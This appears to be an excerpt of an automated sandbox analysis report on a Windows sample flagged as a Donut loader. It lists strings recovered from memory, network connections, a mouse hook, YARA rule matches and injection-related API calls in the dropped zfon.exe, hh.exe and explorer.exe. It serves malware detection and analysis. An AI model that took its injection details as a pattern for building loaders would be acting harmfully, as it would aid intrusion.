Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://nydus.battle.net/App/
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://nydus.battle.net/Bnet/client/purchase/jsutil
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://nydus.battle.net/Pro/
Source: explorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000F.00000003.2123238140.000000000910A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124445214.00000000090FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
Source: nrGkqbCyKP.exeString found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000C.00000002.2053283744.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
Source: explorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
Source: zfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://www.battle.net/shop/simplecheckout/debug-harness
Source: zfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://www.battle.net/shop/simplecheckout/error
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://www.battle.net/shop/simplecheckout/error?error=
Source: zfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarh
Source: zfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://www.battle.net/shop/simplecheckout/navbar
Source: nrGkqbCyKP.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: nrGkqbCyKP.exeString found in binary or memory: https://www.huya.com0
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 3.5.239.146:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: hh.exe, 00000008.00000002.2743230894.000001E47C51F000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_37605130-b
Source: C:\Windows\hh.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior

System Summary

barindex
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.nrGkqbCyKP.exe.3df72e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.nrGkqbCyKP.exe.3dda070.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.nrGkqbCyKP.exe.3ca7600.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 7.2.zfon.exe.7ff79cfb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000002.1995777585.0000029D64782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.2733221999.000001E47A9F0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000002.2045463001.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2059338632.0000026ADFDF7000.00000008.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000003.2010588639.0000026ADE1D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000000.2018147867.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79D0E8AD3 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,7_2_00007FF79D0E8AD3
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD52030 NtQueryInformationProcess,_invalid_parameter_noinfo_noreturn,7_2_0000026ADFD52030
Source: C:\Windows\hh.exeCode function: 8_2_000001E47AA1F9BC NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,8_2_000001E47AA1F9BC
Source: C:\Windows\explorer.exeCode function: 12_2_00B93A07 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,12_2_00B93A07
